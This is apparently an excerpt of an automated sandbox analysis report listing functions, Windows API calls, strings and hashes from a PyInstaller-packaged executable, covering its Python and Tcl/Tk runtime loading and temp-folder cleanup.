                                                                                        • Part of subcall function 00007FF7F3DD2C50: MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                      • API String ID: 3187769757-2863816727
                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction ID: 6e3e81b34d53e10b69dc84d0416274b69e031a06a4304550f486cd0837dcf434
                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction Fuzzy Hash: AC216251B18A4291FBA0B764E8513B6F250BF88394FC00231E57DAA5D9EE2CE505C7A0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                      • Instruction ID: 2ae60ac12aab64c9a0cb1b4a75a229ac41baac33c10c3e2c4ddd982db18a7b32
                                                                                      • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                      • Instruction Fuzzy Hash: EDC1092290D68741E7E96B9594402BDBF50FB81B80FD54231EE6E2B3D1CE7CF48587A2

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                      • API String ID: 2050909247-2434346643
                                                                                      • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                      • Instruction ID: 2e98aeb31ad3609f410d40d03e7cd1250b60627e667e6268e44fecb39f8131b8
                                                                                      • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                      • Instruction Fuzzy Hash: C5414221A1C68691EBA1EBA0E4552E9B321FF44384FC00132EA7D6B6D9DF3CE515C7E0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                      • String ID: Unhandled exception in script
                                                                                      • API String ID: 3081866767-2699770090
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 1279662727-0
                                                                                      Similarity
                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                      • String ID:
                                                                                      • API String ID: 1956198572-0
                                                                                      Similarity
                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                      • String ID:
                                                                                      • API String ID: 3251591375-0
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABC6
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABD0
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast
                                                                                      • String ID:
                                                                                      • API String ID: 918212764-0
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 840049012-0
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                      • Instruction ID: 14259911fba10b205ab8575d644cddd9fc2360b8aaefc027a9b3d251bded4283
                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                      • Instruction Fuzzy Hash: 1121D732A0CA4286DBA5AF78D480379B6A0FB84B54F984234E77D5BAD9DF3DD4018B50
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                      • Instruction ID: c9f0d628ee82bd35dae614c88d92064c933dfc9787066245639ea2bcdb687a73
                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                      • Instruction Fuzzy Hash: 5D01A522A0874640E788EFA39900069EA95BF85FE0F884731DE7C2BBD6CE3CD4818351
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • LoadLibraryExW.KERNELBASE(?,00007FF7F3DD6476,?,00007FF7F3DD336E), ref: 00007FF7F3DD8EA2
                                                                                      Similarity
                                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 2592636585-0
                                                                                      • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                      • Instruction ID: 9fc1e44ba17649362d64e9a2975b989f7e30fda40dfd432bea0d1264e3c36b2b
                                                                                      • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                      • Instruction Fuzzy Hash: 12D0CD01F3514542EB84B7B7754663591515F89FC0FC8C035EE2D07B89DC3CC0514700
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7F3DE0C90,?,?,?,00007FF7F3DE22FA,?,?,?,?,?,00007FF7F3DE3AE9), ref: 00007FF7F3DED63A
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                      • Instruction ID: 4f944dcf989c4b4655febcb2b889ee8b29304b54bc750c377853fe1727b1abd1
                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                      • Instruction Fuzzy Hash: A5F0FE10F0924B49FFD977F1584177999905F947A4F880734DD3E6E2C5DD6CA4C086B2
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                      • API String ID: 3832162212-3165540532
                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction ID: a8d80dfe3c9e3fe2b945a64a1ebc6c5d45b083e293a6540627b65f3584598d47
                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction Fuzzy Hash: 0CD18732A09A8286E790AFB4E8942A9B764FF44758F800235DE7D6B7D8DF3CD145C790
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD842B
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84AE
                                                                                      • DeleteFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84CD
                                                                                      • FindNextFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84DB
                                                                                      • FindClose.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84EC
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84F5
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                      • String ID: %s\*
                                                                                      • API String ID: 1057558799-766152087
                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction ID: d104ce573da2afe3cc8f65e3ca4dda28ce192aa84e5df8c9beee24b0e23e353d
                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction Fuzzy Hash: 57415521A0C54285EBA1BBB4E4941FAB361FB94754FC00231D97E6B7D8DF3CE5498790
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3140674995-0
                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction ID: f02e511d704974825d1110e40f2446076dbc38835b2a37fc8baf5b5eafcf440e
                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction Fuzzy Hash: AC314572609B8186EBA09FA0E8807ED7364FB85748F444039DA5D5BBD9DF3CD648C760
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C45
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                        • Part of subcall function 00007FF7F3DEA948: HeapFree.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                        • Part of subcall function 00007FF7F3DEA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA909
                                                                                        • Part of subcall function 00007FF7F3DEA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA92E
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C34
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 4070488512-0
                                                                                      • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                      • Instruction ID: ce22389b0d4238fabec1117b19ec90c686226e4584af794b52388409d4679bd6
                                                                                      • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                      • Instruction Fuzzy Hash: C4D1D322A0824646E7A4BF71D8801B9E752EF94794FC48135EA3E6F7D9DF3CE44187A0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1239891234-0
                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction ID: d277a1c71338f8291452321b88f62b3e03fdd158b2b04791860cff91d12c42ab
                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction Fuzzy Hash: 21319432608F8285DBA4DF74E8802AEB7A4FB85758F900135EAAD57B99DF3CC145CB50
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 2227656907-0
                                                                                      • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                      • Instruction ID: 9d6aa7df9ac7cfe7ce49a40c7a8e33845df1d62af64414c4ce23ecc254a164ac
                                                                                      • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                      • Instruction Fuzzy Hash: 36B1C762B1869241EBA5ABB195401B9E354FB45BE4FC44231ED7D2FBC9DF3CE4418390
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                        • Part of subcall function 00007FF7F3DF55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55DC
                                                                                        • Part of subcall function 00007FF7F3DEA948: HeapFree.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 3458911817-0
                                                                                      • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                      • Instruction ID: 5a6dba40920c9645f2ea863ef8199061851d97349b4016abef8d2f7b12cae3e4
                                                                                      • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                      • Instruction Fuzzy Hash: 1A518022A0864246E790FF71D8C11A9E761BF58794FC44135EA7E6B7D9DF3CE44087A0
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5840
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5852
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5889
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD589B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58B4
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58C6
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58DF
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58F1
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD590D
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD591F
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD593B
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD594D
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5969
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD597B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5997
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59A9
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59C5
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                      • API String ID: 199729137-653951865
                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction ID: 0de6f68d3225384e993f8530148b715efc1bdc2936629a268c8503234246543b
                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction Fuzzy Hash: B322AC6490EB0B91FBD5BBE5B890574B361AF05795FC41035D83E2A2D8EF3CB16892E0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                      • API String ID: 199729137-3427451314
                                                                                      • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                      • Instruction ID: 2c5970798314cd67353c4770c197becfaa6e639420e33319c842569f418bac22
                                                                                      • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                      • Instruction Fuzzy Hash: 0402AB2490EB0791EBD5BFA5A890578E361AF09755FC41071D83E2A2E8EF3CB15992F0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                      • API String ID: 2943138195-1482988683
                                                                                      • Opcode ID: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
                                                                                      • Instruction ID: cc267c0f1a06e6a2923d8fcf9930fa540f5e774aeef774b5fd791ac74b2cc787
                                                                                      • Opcode Fuzzy Hash: 9af3000e46094686c92b09a1ab6ba282d3ea35f814097fcec630d6e6c72122d6
                                                                                      • Instruction Fuzzy Hash: 2C028172E19E5689FB28AB66DC941FC26B0BB05364FD441B5CA4D12AF8DFBCE524C340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                      • String ID: `anonymous namespace'
                                                                                      • API String ID: 3863519203-3062148218
                                                                                      • Opcode ID: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
                                                                                      • Instruction ID: f2c33f23ba5ceb0da593fb552625adf753da6fb21eebbfbdea0a2325179c6218
                                                                                      • Opcode Fuzzy Hash: c2c563be3abc2cd025459880134dd91d33137c93c5547e13454a58e5101b2a40
                                                                                      • Instruction Fuzzy Hash: BEE18072A08F869AEB10EF66DC801AC77A0FB59754F804071EA8D17BA9DFBCD525C700
                                                                                      APIs
